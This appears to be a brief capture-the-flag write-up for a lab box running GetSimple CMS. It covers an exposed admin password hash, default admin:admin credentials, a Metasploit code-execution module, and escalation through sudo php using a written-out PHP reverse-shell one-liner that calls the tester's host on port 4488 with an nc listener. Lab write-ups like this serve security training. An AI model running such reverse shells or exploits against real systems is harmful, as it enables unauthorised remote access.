Academy
Personal Rating: Easy
For this Starting Point box I do not have much documentation.
At http://10.129.70.149/data/users/admin.xml there was some interesting information to be found:
<item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>admin@gettingstarted.com</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>
I could also log into http://10.129.70.149/admin/settings.php with the very easy to guess credentials admin:admin
SSH with either of the two credential sets did not work
From the other information I had about the page and webserver I used searchsploit to find a likely vulnerability. This module worked to get a meterpreter shell: exploit/multi/http/getsimplecms_unauth_code_exec
With that I could get a user shell as www-data
sudo -l
shew me that php could be executed as admin from the www-data user (SUID binary), so I used this PHP reverse shell:
sudo php -r '$sock=fsockopen("10.10.15.13",4488);exec("/bin/sh -i <&3 >&3 2>&3");'
(with sudo nc -lnvp 4488
) on my host
With that I already had a working shell on the box as root
Last updated